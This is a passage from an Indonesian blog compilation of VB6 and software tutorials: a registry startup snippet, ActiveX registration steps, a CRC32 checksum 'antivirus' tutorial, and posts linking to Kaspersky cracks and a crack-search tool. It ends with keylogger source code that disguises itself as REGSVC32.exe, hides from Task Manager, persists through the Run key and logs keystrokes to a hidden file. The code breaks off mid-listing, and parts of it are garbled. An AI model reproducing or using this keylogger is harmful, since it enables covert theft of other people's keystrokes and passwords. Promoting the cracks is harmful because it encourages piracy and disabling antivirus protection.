Selasa, 08 Februari 2011

script VB startup

Persiapan:
1. Buat 1 Project baru dengan 1 Form, 1 Module,
dan 2 Commandbutton.
2. Copy-kan coding berikut ke dalam editor form & module ybt.
--------------------------------------------------------------------------------------------------------
'Tombol pertama untuk menjalankan program saat startup, sedangkan
'tombol kedua untuk menghapusnya dari daftar startup program.

Code di module

Spoiler
'Credit By AriTheLoverZ
Public Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type

Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" _
(ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, _
ByVal samDesired As Long, phkResult As Long) As Long
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Declare Function RegQueryValueEx Lib "advapi32" Alias "RegQueryValueExA" _
(ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As _
Long, ByRef lpType As Long, ByVal lpData As String, ByRef lpcbData As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal _
hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal _
dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" _
(ByVal hKey As Long, ByVal lpValueName As String) As Long

Public Enum T_KeyClasses
HKEY_CLASSES_ROOT = &H80000000
HKEY_CURRENT_CONFIG = &H80000005
HKEY_CURRENT_USER = &H80000001
HKEY_LOCAL_MACHINE = &H80000002
HKEY_USERS = &H80000003
End Enum

Private Const SYNCHRONIZE = &H100000
Private Const STANDARD_RIGHTS_ALL = &H1F0000
Private Const KEY_QUERY_VALUE = &H1
Private Const KEY_SET_VALUE = &H2
Private Const KEY_CREATE_LINK = &H20
Private Const KEY_CREATE_SUB_KEY = &H4
Private Const KEY_ENUMERATE_SUB_KEYS = &H8
Private Const KEY_EVENT = &H1
Private Const KEY_NOTIFY = &H10
Private Const READ_CONTROL = &H20000
Private Const STANDARD_RIGHTS_READ = (READ_CONTROL)
Private Const STANDARD_RIGHTS_WRITE = (READ_CONTROL)
Private Const KEY_ALL_ACCESS = ((STANDARD_RIGHTS_ALL Or _
KEY_QUERY_VALUE Or KEY_SET_VALUE Or KEY_CREATE_SUB_KEY _
Or KEY_ENUMERATE_SUB_KEYS Or KEY_NOTIFY Or KEY_CREATE_LINK) _
And (Not SYNCHRONIZE))
Private Const KEY_READ = ((STANDARD_RIGHTS_READ Or _
KEY_QUERY_VALUE Or KEY_ENUMERATE_SUB_KEYS Or KEY_NOTIFY) _
And (Not SYNCHRONIZE))
Private Const KEY_EXECUTE = (KEY_READ)
Private Const KEY_WRITE = ((STANDARD_RIGHTS_WRITE Or _
KEY_SET_VALUE Or KEY_CREATE_SUB_KEY) And (Not SYNCHRONIZE))
Private Const REG_BINARY = 3
Private Const REG_CREATED_NEW_KEY = &H1
Private Const REG_DWORD = 4
Private Const REG_DWORD_BIG_ENDIAN = 5
Private Const REG_DWORD_LITTLE_ENDIAN = 4
Private Const REG_EXPAND_SZ = 2
Private Const REG_FULL_RESOURCE_DESCRIPTOR = 9
Private Const REG_LINK = 6
Private Const REG_MULTI_SZ = 7
Private Const REG_NONE = 0
Private Const REG_SZ = 1
Private Const REG_NOTIFY_CHANGE_ATTRIBUTES = &H2
Private Const REG_NOTIFY_CHANGE_LAST_SET = &H4
Private Const REG_NOTIFY_CHANGE_NAME = &H1
Private Const REG_NOTIFY_CHANGE_SECURITY = &H8
Private Const REG_OPTION_BACKUP_RESTORE = 4
Private Const REG_OPTION_CREATE_LINK = 2
Private Const REG_OPTION_NON_VOLATILE = 0
Private Const REG_OPTION_RESERVED = 0
Private Const REG_OPTION_VOLATILE = 1
Private Const REG_LEGAL_CHANGE_FILTER = (REG_NOTIFY_CHANGE_NAME _
Or REG_NOTIFY_CHANGE_ATTRIBUTES Or _
REG_NOTIFY_CHANGE_LAST_SET Or _
REG_NOTIFY_CHANGE_SECURITY)
Private Const REG_LEGAL_OPTION = (REG_OPTION_RESERVED Or _
REG_OPTION_NON_VOLATILE Or REG_OPTION_VOLATILE Or _
REG_OPTION_CREATE_LINK Or REG_OPTION_BACKUP_RESTORE)

Public Sub DeleteValue(rClass As T_KeyClasses, Path As String, sKey As String)
Dim hKey As Long
Dim res As Long
res = RegOpenKeyEx(rClass, Path, 0, KEY_ALL_ACCESS, hKey)
res = RegDeleteValue(hKey, sKey)
RegCloseKey hKey
End Sub

Public Function SetRegValue(KeyRoot As T_KeyClasses, Path As String, sKey As _
String, NewValue As String) As Boolean
Dim hKey As Long
Dim KeyValType As Long
Dim KeyValSize As Long
Dim KeyVal As String
Dim tmpVal As String
Dim res As Long
Dim i As Integer
Dim x As Long
res = RegOpenKeyEx(KeyRoot, Path, 0, KEY_ALL_ACCESS, hKey)
If res <> 0 Then GoTo Errore
tmpVal = String(1024, 0)
KeyValSize = 1024
res = RegQueryValueEx(hKey, sKey, 0, KeyValType, tmpVal, KeyValSize)
Select Case res
Case 2
KeyValType = REG_SZ
Case Is <> 0
GoTo Errore
End Select
Select Case KeyValType
Case REG_SZ
tmpVal = NewValue
Case REG_DWORD
x = Val(NewValue)
tmpVal = ""
For i = 0 To 3
tmpVal = tmpVal & Chr(x Mod 256)
x = x 256
Next
End Select
KeyValSize = Len(tmpVal)
res = RegSetValueEx(hKey, sKey, 0, KeyValType, tmpVal, KeyValSize)
If res <> 0 Then GoTo Errore
SetRegValue = True
RegCloseKey hKey
Exit Function
Errore:
SetRegValue = False
RegCloseKey hKey
End Function
'Credit By AriTheLoverZ



Code Ini Di Form
Spoiler
'Credit By AriTheLoverZ
Private Sub Command1_Click()
'Ganti kedua kata 'NotePad' di bawah dengan nama aplikasi Anda, dan
'c:windows
otepad.exe' di bawah dengan file aplikasi Anda...
SetRegValue HKEY_LOCAL_MACHINE, _
"SoftwareMicrosoftWindowsCurrentVersionRun", "NotePad", "c:windows
otepad.exe"
End Sub

Private Sub Command2_Click()
DeleteValue HKEY_LOCAL_MACHINE, _
"SoftwareMicrosoftWindowsCurrentVersionRun", "NotePad"
End Sub
'Credit By Nandha


Semoga Membantu

[Tutorial] Cara Menginstalasikan ActiveX Control (.ocx)

trik jadul alias dah basi sbenernya..
neh buat yang lum tauw aja yang udah taw silahkan duduk & diem aj...
:P:P
Di dalam forum Nstars.Net
ini bnyk software yg membutuhkan komponen ActiveX yg kdg gada ato ga
terinstalasi dgn baik di kompi pengguna. Gambar dbwh ini adalah problem
yg nongol klo ActiveX Control gada ato ga terinstalasikan dgn baik di
system Windows..

Posted Image

Posted Image

Dlm gmbr pertama komponen mswinsck.ocx dan gmbr kedua komponen RichTx32.ocx
yg gada ato ga terinstalasikan dgn baik di system Windows.. Artikel ini
akan membahas ttg prosedur meregistrasikan komponen ActiveX untuk Windows XP dan Windows Vista



Windows XP

Cara 1

  • Cek apakah file2 itu ada di folder system32
  • Klo blm ada, dongdot dl filenya trs copy ke folder system32
    Website bwt dongdot file2 ActiveX:
    Code:
    [url="http://www.ocxdump.com/"]www.ocxdump.com[/url]
  • Start - Run...
  • Ketik cmd di kotak dialog Run
  • Stlh muncul window commandprompt (window berwarna hitam dgn tulisan putih / DOS), ketik perintah berikut ini:

    Code:
  • regsvr32
    .exe
    mislnya
    Code:
  • regsvr32.exe mswinsck.ocx
  • Klo sukses akan muncul pesan sukses ky gmbr dbwh ini:

    Posted Image
  • Klo lo dah ga memerlukan komponen ActiveX maka komponen itu bs di unregister-kan dgn cara ky diatas, syntax nya adlh:

    Code:
  • regsvr32.exe /u 

    mislnya
    Code:
  • regsvr32.exe /u mswinsck.ocx


Cara 2
Prosedur
diatas sering agak ngerepotin bagi sebagian orang karena harus ngetik
di DOS command prompt. Nah, berikut ini cara bwt register ato
unregister komponen ActiveX lwt Windows Explorer dgn manfaatin shell
context menu. Jadi klo qta klik kanan pada file yg ber-ekstensi dll atau ocx maka menu register dan unregister akan muncul pada context menu.

Copy code di bawah ini ke notepad dan simpen dgn nama activexregunreg.reg

Code:
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\.exe]
@="exefile"
[HKEY_CLASSES_ROOT\.dll]
@="dllfile"
[HKEY_CLASSES_ROOT\.ocx]
@="ocxfile"
[HKEY_CLASSES_ROOT\.olb]
@="olbfile"
[HKEY_CLASSES_ROOT\exefile\shell\Register\command]
@="%1 /register"
[HKEY_CLASSES_ROOT\dllfile\shell\Register\command]
@="regsvr32.exe %1"
[HKEY_CLASSES_ROOT\ocxfile\shell\Register\command]
@="regsvr32.exe %1"
[HKEY_CLASSES_ROOT\olbfile\shell\Register\command]
@="regsvr32.exe %1"
[HKEY_CLASSES_ROOT\dllfile\shell\Silent Register\command]
@="regsvr32.exe /s %1"
[HKEY_CLASSES_ROOT\ocxfile\shell\Silent Register\command]
@="regsvr32.exe /s %1"
[HKEY_CLASSES_ROOT\olbfile\shell\Silent Register\command]
@="regsvr32.exe /s %1"
[HKEY_CLASSES_ROOT\exefile\shell\UnRegister\command]
@="%1 /unregister"
[HKEY_CLASSES_ROOT\dllfile\shell\UnRegister\command]
@="regsvr32.exe /u %1"
[HKEY_CLASSES_ROOT\ocxfile\shell\UnRegister\command]
@="regsvr32.exe /u %1"
[HKEY_CLASSES_ROOT\olbfile\shell\UnRegister\command]
@="regsvr32.exe /u %1"
[HKEY_CLASSES_ROOT\dllfile\shell\Silent UnRegister\command]
@="regsvr32.exe /u /s %1"
[HKEY_CLASSES_ROOT\ocxfile\shell\Silent UnRegister\command]
@="regsvr32.exe /u /s %1"
[HKEY_CLASSES_ROOT\olbfile\shell\Silent UnRegister\command]
@="regsvr32.exe /u /s %1"


Abis tu save file nya dan dobel klik file activexregunreg.reg dari Windows Explorer bwt memasukkannya ke sistem registry. Sekarang lo bisa klik kanan file komponen ActiveX, misalnya dll atau ocx dari Windows Explorer. Akan muncul shell context menu ky gmbr dbwh ini:

Posted Image



Windows Vista

  • Cek apakah file2 itu ada di folder system32
  • Klo blm ada, dongdot dl filenya trs copy ke folder system32
    Website bwt dongdot file2 ActiveX:
    Code:www.ocxdump.com
  • Klik Start
  • Di sblh kiri bwh ketik cmd
  • Bagian atas kotak Start akan berganti ke programs yg berisikan cmd
  • Klik kanan pada cmd dan pilih Run as Administrator
  • Klik smua pd tombol Continue dan Allow dan window berwarna hitam dgn tulisan putih / DOS akan nongol
  • Ketik:

    Code:
  • regsvr32.exe C:\Windows\System32\

    mislnya
    Code:
  • regsvr32.exe C:\Windows\System32\mswinsck.ocx
  • Klo sukses maka akan nongol pesan sukses ky dbwh ini:

    Quote
  • [b]:[/b]DllRegisterServer in C:\WINDOWS\System32\mswinsck.ocx succeeded.


Atau cara lainnya adalah:

  • Register dgn fungsi UAC dimatikan
    msconfig > tools > disable UAC
    trs restart kompi lo..

    Atau
  • Jalankan CLI dlm modus Run as Administrator dan ketik:

    Code:
  • Spoiler
    regsvr32 \windows\system32\mswinsck.ocx




Smoga berguna.. :D:D
TQ...

SUMBER  :N2

membuar ANTI VIRUS sederhana dengan menggunakan VISUAL BASIC 6

Cara Kerja AV(Antivirus) sederhana..
1. Engine scanner, ini merupakan komponen utama AV dalam mengenali sebuah pattern virus. Engine ini dapat dikelompokkan menjadi statis dan dinamis. Statis dalam hal ini dapat disebut menjadi spesifik terhadap pattern tertentu dari sebuah file virus. Checksum merupakan salah satu contoh dari engine statis ini. Dinamis dalam artian dia mengenali perilaku umum sebuah virus. Heuristic menjadi salah satu contohnya.
2. Database definition, menjadi sebuah referensi dari sebuah pattern file virus. Engine statis sangat bergantung kepada komponen ini.
3. Decompress atau unpacking engine, khusus untuk pengecekan file-file yang terkompresi (*.rar, *.zip, dll) atau kompresi atau packing untuk file PE seperti UPX, MeW , dll.

Tidak jarang hasil dari pengecekan terhadap file suspect virus menghasilkan false-positive bahkan false-negative (– false-positive berarti file yang bersih dianggap thread oleh AV, dan false-negative berarti file yang 100% thread akan dianggap bersih). Semua itu dapat diakibatkan oleh ketidak-sempurnaan dari engine scanner itu sendiri. Misal
pada contoh kasus Engine String scanner (–Engine scanner yang menyeleksi string-string dari file text-based), bila diterapkan rule 3 out of 5 (– bila AV menemukan 3 dari daftar 5 string kategori malicious) maka AV akan memberikan bahwa file terindikasi sebuah thread yang positif. Padahal file tsb nyatanya tidak menimbulkan efek berbahaya bila dijalankan atau dieksekusi. Kesalahan scanning macam ini lazim ditemukan untuk file-file *.VBS, *.HTML, dll. Untuk penggunaan engine checksum sangat banyak ditemui di beberapa software AV lokal. Checksum yang lazim digunakan diantaranya CRC16, CRC32, MD5, dll. Dikarenakan mudah untuk diimplementasikan. Engine ini sendiri bukannya tanpa cacat, Checksum bekerja dengan memproses byte demi byte dari sebuah file dengan sebuah algoritma tertenu (– tergantung dari jenis checksum yang digunakan) sehingga menghasilkan sebuah format tertentu dari file tsb. Contoh checksum menggunakan CRC32 dan MD5 :
* calCrc = CRC32(file_name_and_path)
* calMD5 = MD5(file_name_and_path)

Maka isi dari string calCrc adalah 7AF9E376, sedangkan untuk MD5nya adalah 529CA8050A00180790CF88B63468826A. Perlu diketahui bila virus menerapkan rutin yang mengubah byte tertentu dari badan virus tsb setiap kali maka penggunaan engine checksum ini akan kurang optimal karena bila 1 byte berubah dari file maka checksum juga akan berubah.

Mari kita belajar membuat sebuah AV sederhana, yang diperlukan :
1. Software Visual Basic 6.0
2. Sedikit pemahaman akan pemograman Visual Basic 6.0
3. Sampel file bersih atau virus (– opsional)

First#
Sekarang kita akan belajar membuat sebuah rutin sederhana untuk :
- Memilih file yang akan dicek- Membuka file tersebut dalam mode binary- Memproses byte demi byte untuk menghasilkan Checksum

Buka MS-Visual Basic 6.0 anda, lalu buatlah sebuah class module dan Form dengan menambahkan
sebuah objek Textbox, CommonDialog dan Command Button. (Objek CommonDialog dapat ditambahkan dengan memilih
Project -> COmponent atau Ctrl-T dan memilih Microsoft Common Dialog Control 6.0) Ketikkan kode berikut pada class module (kita beri nama class module tsb clsCrc) :
================= START HERE ====================

Private crcTable(0 To 255) As Long crc32
Public Function CRC32(ByRef bArrayIn() As Byte, ByVal lLen As Long, Optional ByVal lcrc As Long = 0) As Long
bArrayIn adalah array byte dari file yang dibaca, lLen adalah ukuran atau size file

Dim lCurPos As Long Current position untuk iterasi proses array bArrayIn
Dim lTemp As Long variabel temp hasil perhitungan
If lLen = 0 Then Exit Function keluar fungsi apabila ukuran file = 0
lTemp = lcrc Xor &HFFFFFFFF
For lCurPos = 0 To lLen
lTemp = (((lTemp And &HFFFFFF00) &H100) And &HFFFFFF) Xor (crcTable((lTemp And 255) Xor bArrayIn(lCurPos)))
Next lCurPos

CRC32 = lTemp Xor &HFFFFFFFF
End Function

Private Function BuildTable() As Boolean
Dim i As Long, x As Long, crc As Long
Const Limit = &HEDB88320
For i = 0 To 255
crc = iFor x = 0 To 7
If crc And 1 Then
crc = (((crc And &HFFFFFFFE) 2) And &H7FFFFFFF) Xor LimitElse
crc = ((crc And &HFFFFFFFE) 2) And &H7FFFFFFFEnd If
Next x
crcTable(i) = crc
Next iEnd Function

Private Sub Class_Initialize()
BuildTableEnd Sub
================= END HERE ====================

Lalu ketikkan kode berikut dalam event Command1_Click :
================= START HERE ====================

Dim namaFileBuka As String, HasilCrc As String
Dim CCrc As New clsCrc bikin objek baru dari class ClsCrc
Dim calCrc As Long
Dim tmp() As Byte array buat file yang dibaca

Private Sub Command1_Click()
CommonDialog1.CancelError = True error bila user mengklik cancel pada CommonDialog
CommonDialog1.DialogTitle = Baca File Caption commondialog
On Error GoTo erorhandle label error handle

CommonDialog1.ShowOpen
namafilbuka = CommonDialog1.FileNameOpen namafilbuka For Binary Access Read As #1 buka file yang dipilih dengan akses baca pada mode binary
ReDim tmp(LOF(1) - 1) As Byte deklarasi ulang untuk array, # Bugs Fixed #
Get #1, , tmp()
Close #1

calCrc = UBound(tmp) mengambil ukuran file dari array
calCrc = CCrc.CRC32(tmp, calCrc) hitung CRC

HasilCrc = Hex(calCrc) diubah ke format hexadesimal, karena hasil perhitungan dari class CRC masih berupa numeric
Text1.Text = HasilCrc tampilkan hasilnyaExit Sub

erorhandle:
If Err.Number <> 32755 Then MsgBox Err.Description error number 32755 dalah bila user mengklik tombol cancel pada saat memilih file
================= END HERE ====================

COba anda jalankan program diatas dengan memencet tombol F5, lalu klik Command1 untuk memilih dan membuka file. Maka program akan menampilkan CRC32nya.

Second#
Kode diatas dapat kita buat menjadi sebuah rutin pengecekan file suspect virus dengan antara membandingkan hasil CRC32nya dan database CRC kita sendiri. Algoritmanya adalah :
- Memilih file yang akan dicek- Membuka file tersebut dalam mode binary- Memproses byte demi byte untuk menghasilkan Checksum- Buka file database
- Ambil isi file baris demi baris- Samakan Checksum hasil perhitungan dengan checksum dari file

Format file database dapat kita tentukan sendiri, misal :
- FluBurung.A=ABCDEFGH- Diary.A=12345678
Dimana FluBurung.A adalah nama virus dan ABCDEFGH dalah Crc32nya. Jika kita mempunyai format file seperti diatas, maka kita perlu membaca file secara sekuensial per baris serta memisahkan antara nama virus dan Crc32nya. Dalam hal ini yang menjadi pemisah adalah karakter ‘=’.
Buat 1 module baru (– diberi nama module1) lalu isi dengan kode :
================= START HERE ====================
Public namaVirus As String, CrcVirus As String deklarasi variabel global untuk nama dan CRC virus Public pathExe as String deklarasi variabel penyimpan lokasi file EXE AV kita
Public Function cariDatabase(Crc As String, namaFileDB As String) As Boolean
Dim lineStr As String, tmp() As String variabel penampung untuk isi file
Open namaFileDB For Input As #1 buka file dengan mode input
Do
Line Input #1, lineStr
tmp = Split(lineStr, “=”) pisahkan isi file bedasarkan pemisah karakter ‘=’
namaVirus = tmp(0) masukkan namavirus ke variabel dari array
CrcVirus = tmp(1) masukkan Crcvirus ke variabel dari arrayIf CrcVirus = Crc Then bila CRC perhitungan cocok/match dengan database
cariDatabase = True kembalikan nilai TRUEExit Do keluar dari perulanganEnd If
Loop Until EOF(1)
Close #1
End Function
================= END HERE ====================

Lalu tambahkan 1 objek baru kedalam Form, yaitu Command button2. lalu ketikkan listing kode berikut kedalam event Command2_Click :
================= START HERE ====================
If Len(App.Path) <= 3 Then bila direktori kita adalah root direktori
pathEXE = App.PathElse
pathEXE = App.Path & “”
End If

CommonDialog1.CancelError = True error bila user mengklik cancel pada CommonDialog
CommonDialog1.DialogTitle = Baca File Caption commondialog
On Error GoTo erorhandle label error handle

CommonDialog1.ShowOpen
namafilbuka = CommonDialog1.FileNameOpen namafilbuka For Binary Access Read As #1 buka file yang dipilih dengan akses baca pada mode binary
ReDim tmp(LOF(1) - 1) As Byte deklarasi ulang untuk array # Bugs Fixed #
Get #1, , tmp()
Close #1

calCrc = UBound(tmp) mengambil ukuran file dari array
calCrc = CCrc.CRC32(tmp, calCrc) hitung CRC

HasilCrc = Hex(calCrc) diubah ke format hexadesimal, karena hasil perhitungan dari class CRC masih berupa numericIf cariDatabase(HasilCrc, pathEXE & DB.txt”) Then bila fungsi bernilai TRUE
MsgBox Virus ditemukan :  & namaVirus tampilkan message BoxEnd If
Exit Sub

erorhandle:
If Err.Number <> 32755 Then MsgBox Err.Description error number 32755 dalah bila user mengklik tombol cancel pada saat memilih file
================= END HERE ====================

Sabtu, 05 Februari 2011

SOFWARE PENCARI SERIAL NUMBER DENGAN MUDAH

Jika
kita ingin mencari Serial number, crack ataupun keygen dari suatu
Software atau program biasanya kita mencari menggunakan Google ataupun
yahoo dengan mengggunakan kata kunci tertentu sehingga nantinya hasil
pencariannya akan diberikan Link website-website yang menyediakannya.
Ataupun dapat juga langsung mengunjungi website yang khusus menyediakan
hal tersebut seperti Astalavista.
tapi adakalanya jika kita langsung mengunjungi website-website tersebut
sering kali kita direpotkan oleh Spam, popup ataupun spyware yang
terdapat dalam website tersebut.

Jika ingin aman dan tidak
direpotkan oleh hal-hal semacam itu, kita bisa menggunakan suatu
software yang bisa mencari Serial number ataupun crack dari suatu
software tanpa kita harus masuk langsung ke website yang menyediakan
hal tersebut.

Nama Softwarenya adalah "CRAAGLE" yang merupakan
software ringan yang bisa digunakan untuk mencari serial number dan
Crack dari suatu software secara online dengan hanya mengetikkan nama
software yang akan kita cari pada kolom searchnya.


Gambaran umum dari software ini dapat dilihat dibawah ini :

Cara menggunakannya cukup mudah,


  • Download Softwarenya disini
  • Setelah
    didownload, Ekstrak kedalam komputer anda dan langsung jalankan program
    ini (tidak perlu proses instalasi) dengan mengklik file "Craagle.exe"
  • Pastikan koneksi internet anda sudah aktif
  • Ketikkan nama Software/program yang akan dicari pada kotak "Search" lengkap dengan Versinya contoh : Winzip 9.0
  • lalu tandai jenis pencariannya "Crack", "Serial" ataupun "Cover"
  • Klik Tombol "Search"
  • Biarkan software ini bekerja mencari yang anda inginkan
  • Jika telah selesai bekerja, hasil pencarian akan terlihat seperti gambar dibawah ini :

Untuk
serial number tinggal anda klik saja salah satu hasil pencariannya dan
akan terlihat isi serial numbernya pada kotak dibawahnya. Untuk crack
dan covers, pilih hasil pencarian yang ada, klik kanan dan pilih
Download.

Posting ini hanya sekedar tutorial untuk pengetahuan
belaka, jika terdapat penyalahgunaan dari software ataupun tutorial
ini, bukan merupakan tanggung jawab penulis.

Semoga berguna
sumber : http://anggabhandel009.blogspot.com

Prevx 3.0

Prevx Antivirus,Antivirus Sangat Ringan dan telah diakui Dunia sebagai Antivirus Standar Dunia.Ukurannya Hanya 923Kb,tetapi kinerjanya yg cepat dan kelebihannya pada RTP membuat Antivirus ini sangat Istimewa.Bagi yang ingin mencoba Prevx Bisa Download Disini >
DISINI

Download AVG Antivirus 2011 Offline Baru

AVG AntiVirus 2011 Offline Installer memungkinkan Anda untuk:

* Jelajahi dan telusuri dengan penuh keyakinan Perlindungan seketika AVG LinkScanner
* Tetap terlindungi di jaringan sosial dengan Perlindungan Jaringan Sosial AVG
* Nikmati PC yang berjalan lebih cepat Pemindaian Cerdas AVG bekerja selagi Anda tinggalkan dan berjalan dalam mode prioritas rendah saat Anda kembali
* Tetap terinformasikan dengan informasi ancaman terbaru dari Jaringan Perlindungan Komunitas AVG dan Teknologi Awan Pelindung AVG

Silahkan anda unduh gratis AVG AntiVirus 2011 Offline Installer dibawah ini:









  • Free Download AVG Antivirus 2011 untuk Windows (32bit)







  • Free Download AVG Antivirus 2011 untuk Windows (64bit)







  • Free Download Serial Number AVG Antivirus 2011 Offline (SN)

  • Kaspersky 2011 Crack Untuk Lisensi 3700 Hari

    Dengan crack kaspersky 2011 ini anda dapat menggunakan Kaspersky Antivirus 2011 (KAV)dan kaspersky Internet Security 2011 (KIS) menjadi full version sampai dengan 3700 hari. Dan apapun produk kaspersky yang anda pergunakan saat ini seperti KAV 2011 atau KIS 2011 semuanya komputer Anda akan menjadi aman dari berbagai gangguan virus dan lain-lain. Disini anda tidak perlu untuk mengeluarkan uang sepeserpun alias gratis untuk mendapatkan sebuah kaspersky 2011 crack. Segera unduh dibawah ini dan pergunakan dengan sebaik-baiknya.



  • Free Download Kaspersky 2011 Crack

  • Kaspersky Crack Anti Black List

    Kaspersky Crack

    Bagi pecinta AntiVirus Kaspersky, pasti sedikit risih dengan anti virus Kaspersky ini, karena Key yang selalu ter-Black List setelah Update, saya sendiri sudah malas untuk meng-update key kaspersky, karena cepat sekali ter-black list.

    Untuk Kaspersky 2010 kebawah, kini sudah ada solusi dari masalah diatas yaitu dengan menggunakan crack AntiBlack List. Tetapi untuk Kaspersky 2011 belum dapat digunakan, jadi silakan menunggu dan gunakan key.

    Penggunaan Crack ini sangat mudah, silakan anda buka kaspersky terlebih dahulu, kemudian klik setting, maka akan muncul jendela seperti dibawah ini.

    Setting

    Kemudian klik option pada menu di sebelah kiri, kemudian pada kotak Enable Self Defense silakan anda hilangkan tanda ceklist-nya, klik ok. kemudian silakan anda exit Kaspersky anda dengan klik kanan pada icon di system tray pilih exit.

    Setelah kaspersky sudah tidak aktif, silakan anda jalankan "Kaspersky Blacklist Crack.exe" anda tinggal instal seperti biasa, jika sudah selesai, silakan anda jalankan kembali kaspersky, kemudian klik aktifkan dengan key yang saya berikan didalam satu folder AntiBlackList ini.

    Silakan anda update kaspersky anda, dan anda tidak perlu khawatir lagi untuk masalah key Black List..

    Baiklah untuk mendownload Kaspersky Blacklist Crack ini, silakan anda klik link download dibawah ini..

     Download Via Ziddu         Download Via UserShare

    Kaspersky 2011 Crack

    All Kaspersky 2011 Crack – Khusus untuk Kaspersky Anti Virus 2011 dan Kaspersky Internet Security 2011.Berhubung banyak yang request mengenai crack kaspersky 2011, maka kali ini saya memberikan crack tersebut. Setelah selesai download, silahkan di baca mengenai tutorial cara melakukannya.

    Download
    All Kaspersky 2011 Crack Installer
    No Pass Rar

    Keylogger – Keylogging

    Sumber : spyrozone.net
    berikut ini source code KeyLogger yang bisa kamu compile pake VB 6.0. Kita hanya butuh sebuah timer dan module.
    Yang perlu diperhatikan :
    1. setelah REGSVC32.exe dieksekusi, keylogger tsg akan lg menulis di registry agar program tsb dieksekusi pd waktu booting:
    (hkey_local_machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run).
    2. Aktifitas keylogger ini tidak dapat dilihat melalui task manager (Ctrl+Alt+Del)
    3. kamu tidak dapat menghapus file REGSVC32.exe (this file is being used by windows)
    4. kamu tidak dapat menghentikan booting REGSVC32.exe melalui regedit ato msconfig
    5. Untuk melihat hasil rekaman KeyLogger ini kamu bisa buka file REGSVC32.DLL dengan Notepad
    6. selama Keylogger ini aktif kamu tidak bisa melakukan Logoff user … :(
    ======= code mulai ==========================
    ‘simpan file hasil compile dg nama regsvc32.exe
    ‘form
    ‘simpan dg nama FRMLOG.frm
    Option Explicit
    Private Declare Sub Sleep Lib “kernel32″ (ByVal dwMilliseconds As Long)
    Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer
    Private Declare Function RegCreateKey Lib “advapi32.dll” Alias “RegCreateKeyA” (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
    Private Declare Function RegSetValueEx Lib “advapi32.dll” Alias “RegSetValueExA” (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
    Private Declare Function RegisterServiceProcess Lib “kernel32″ (ByVal ProcessID As Long, ByVal ServiceFlags As Long) As Long
    Private Declare Function GetCurrentProcessId Lib “kernel32″ () As Long
    Private sAppName As String
    Private Const REG_SZ = 1
    Private Const LOCALMACHINE = &H80000002
    Private Const RSP_SIMPLE_SERVICE = 1
    Private Const RSP_UNREGISTER_SERVICE = 0
    Private Const VK_BACK = &H8
    Private Const VK_CONTROL = &H11
    Private Const VK_SHIFT = &H10
    Private Const VK_TAB = &H9
    Private Const VK_RETURN = &HD
    Private Const VK_MENU = &H12
    Private Const VK_ESCAPE = &H1B
    Private Const VK_CAPITAL = &H14
    Private Const VK_SPACE = &H20
    Private Const VK_SNAPSHOT = &H2C
    Private Const VK_UP = &H26
    Private Const VK_DOWN = &H28
    Private Const VK_LEFT = &H25
    Private Const VK_RIGHT = &H27
    Private Const VK_MBUTTON = &H4
    Private Const VK_RBUTTON = &H2
    Private Const VK_LBUTTON = &H1
    Private Const VK_PERIOD = &HBE
    Private Const VK_COMMA = &HBC
    Private Const VK_NUMLOCK = &H90
    Private Const VK_NUMPAD0 = &H60
    Private Const VK_NUMPAD1 = &H61
    Private Const VK_NUMPAD2 = &H62
    Private Const VK_NUMPAD3 = &H63
    Private Const VK_NUMPAD4 = &H64
    Private Const VK_NUMPAD5 = &H65
    Private Const VK_NUMPAD6 = &H66
    Private Const VK_NUMPAD7 = &H67
    Private Const VK_NUMPAD8 = &H68
    Private Const VK_NUMPAD9 = &H69
    Private Const VK_F9 = &H78
    Private Const VK_F8 = &H77
    Private Const VK_F7 = &H76
    Private Const VK_F6 = &H75
    Private Const VK_F5 = &H74
    Private Const VK_F4 = &H73
    Private Const VK_F3 = &H72
    Private Const VK_F2 = &H71
    Private Const VK_F12 = &H7B
    Private Const VK_F11 = &H7A
    Private Const VK_F10 = &H79
    Private Const VK_F1 = &H70
    Private Sub LoadTextFile()
    On Error GoTo dlgerror
    If Len(App.Path) <= 3 Then
    Open App.Path & “settings.ini” For Input As #1
    Line Input #1, sAppName
    Close
    Else
    Open App.Path & “\settings.ini” For Input As #1
    Line Input #1, sAppName
    Close
    End If
    If sAppName = vbNullString Then
    sAppName = “regsvc32″
    End If
    Exit Sub
    dlgerror:
    sAppName = “regsvc32″
    End Sub
    Private Sub SAVEDLL()
    Dim nSaveLocation As String
    On Error GoTo dlgerror
    If Len(App.Path) <= 3 Then
    Open App.Path & sAppName & “.dll” For Append As #1
    nSaveLocation = App.Path & sAppName & “.dll”
    GoTo READY
    Else
    Open App.Path & “\” & sAppName & “.dll” For Append As #1
    nSaveLocation = App.Path & “\” & sAppName & “.dll”
    GoTo READY
    End If
    READY:
    If txtLOGGED.Text = vbNullString Then
    Exit Sub
    End If
    Print #1, Time & ” ” & Date & vbCrLf & “Size: ” & Format(FileLen(nSaveLocation) / 1000000, “.0″) & ” MB” & vbCrLf & “*** PROGRAMS OPENED ***” & vbCrLf & vbCrLf & txtENUMERATE.Text & vbCrLf & vbCrLf & txtLOGGED.Text & vbCrLf & vbCrLf
    Close
    Close
    Close
    SetAttr nSaveLocation, vbHidden
    Exit Sub
    dlgerror:
    Err.Clear
    Exit Sub
    End Sub
    Private Sub Form_Load()
    On Error Resume Next
    Call LoadTextFile
    Me.Caption = sAppName
    Me.Visible = False
    App.TaskVisible = False
    App.Title = sAppName
    ENTERREGISTRY
    RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE
    End Sub
    Private Sub ENTERREGISTRY()
